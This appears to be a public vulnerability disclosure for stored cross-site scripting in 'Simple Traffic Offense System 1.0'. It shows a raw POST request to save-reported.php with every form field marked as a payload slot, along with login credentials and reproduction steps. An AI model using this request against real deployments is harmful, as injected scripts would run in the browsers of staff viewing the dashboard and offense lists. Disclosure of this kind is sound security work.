38 lines
No EOL
1.4 KiB
Text
38 lines
No EOL
1.4 KiB
Text
# Exploit Title: Simple Traffic Offense System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS)
|
||
# Date: 30-06-2021
|
||
# Exploit Author: Barış Yıldızoğlu
|
||
# Vendor Homepage: https://www.sourcecodester.com/
|
||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/trafic.zip
|
||
# Version: 1.0
|
||
# Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3
|
||
|
||
# Description: Almost all inputs contain Stored XSS on the website
|
||
|
||
Request:
|
||
|
||
POST /Trafic/save-reported.php HTTP/1.1
|
||
Host: 127.0.0.1
|
||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
|
||
Firefox/78.0
|
||
Accept:
|
||
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||
Accept-Language: en-US,en;q=0.5
|
||
Accept-Encoding: gzip, deflate
|
||
Content-Type: application/x-www-form-urlencoded
|
||
Content-Length: 168
|
||
Origin: http://127.0.0.1
|
||
Connection: close
|
||
Referer: http://127.0.0.1/Trafic/report-offence.php
|
||
Cookie: PHPSESSID=vbsq5n2m09etst1mfcmq84gifo
|
||
Upgrade-Insecure-Requests: 1
|
||
|
||
offence_id={Payload here}&vehicle_no={Payload here}&driver_license={Payload
|
||
here}&name={Payload here}&address={Payload here}&gender={Payload
|
||
here}&officer_reporting={Payload here}&offence={Payload here}
|
||
|
||
|
||
# Steps to Reproduce:
|
||
[1.] Login to the system [+] username=Torrahclef&pass=yemiyemi
|
||
[2.] Go to the Report Offense page
|
||
[3.] Send the request above with the Stored XSS payload
|
||
[4.] Dashboard and Offense list pages will be triggered |